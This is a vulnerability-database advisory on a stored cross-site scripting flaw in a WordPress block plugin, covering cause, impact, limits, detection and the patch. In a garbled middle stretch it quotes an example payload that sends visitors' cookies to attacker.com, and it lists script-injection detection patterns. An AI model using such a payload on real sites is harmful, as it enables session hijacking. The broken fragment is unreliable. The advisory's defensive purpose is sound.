
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-15021 is a Stored Cross-Site Scripting (XSS) vulnerability in the Gotham Block Extra Light plugin for WordPress, affecting all versions up to and including 1.5.0. The flaw stems from insufficient input sanitization and output escaping in admin settings, allowing authenticated attackers with administrator-level permissions to inject arbitrary web scripts into pages. The vulnerability is limited in scope: it only affects WordPress multi-site installations or single-site installations where unfiltered_html has been disabled. It was published on January 14, 2026, and carries a CVSS v3.1 base score of 4.4 (Medium), assigned by Wordfence (Wordfence, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The root cause is that the plugin fails to properly sanitize user-supplied input in admin settings fields and does not escape output when rendering those values on pages. An authenticated attacker with administrator privileges can save malicious JavaScript payloads through the plugin's settings interface; these scripts are then persistently stored and executed in the browser of any user who visits an affected page. The vulnerable code paths are identifiable in gothamblock.php at lines 463, 470, 495, 500, 504, 519, 564, and 578 (WordPress Trac).
Successful exploitation allows an attacker to persistently inject and execute arbitrary JavaScript in the context of other users' browsers on affected WordPress sites. This can lead to session hijacking, credential theft, defacement, or redirection of users to malicious sites. The scope is marked as "Changed" in the CVSS vector, indicating the impact extends beyond the plugin itself to the broader WordPress site and its visitors. Confidentiality and integrity are both assessed as Low impact, with no availability impact (Wordfence).
Exploitation requires authenticated access with administrator-level privileges, which significantly limits the attack surface. The vulnerability is further constrained to multi-site WordPress installations or those with unfiltered_html disabled, reducing the population of affected targets. No public proof-of-concept exploit code or in-the-wild exploitation has been reported. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, Red Hat CVE).
unfiltered_html disabled that has the Gotham Block Extra Light plugin (version ≤ 1.5.0) installed and active.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into one of the vulnerable admin settings fields corresponding to the unsanitized input points in gothamblock.php.<script>, javascript:, onerror=, onload=) in the WordPress options table entries associated with the Gotham Block Extra Light plugin.gothamblock.php or related plugin files, which could indicate a secondary compromise following XSS exploitation.A patch was released in plugin changeset 3438393, which addresses the insufficient sanitization and escaping issues (WordPress Trac Changeset). WordPress site administrators should update the Gotham Block Extra Light plugin to the patched version (beyond 1.5.0) as soon as it is available through the WordPress plugin repository. As an interim workaround, administrators can disable the plugin on affected multi-site installations or re-enable unfiltered_html where policy permits, though neither is a permanent fix. Restricting administrator account access and enforcing strong authentication (e.g., MFA) reduces the risk of an attacker obtaining the credentials needed to exploit this vulnerability.
The vulnerability was discovered and reported by Wordfence, which assigned the CVE and published the initial advisory on January 14, 2026. No significant broader media coverage or notable community commentary beyond standard vulnerability database aggregation has been observed for this low-severity, limited-scope issue (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."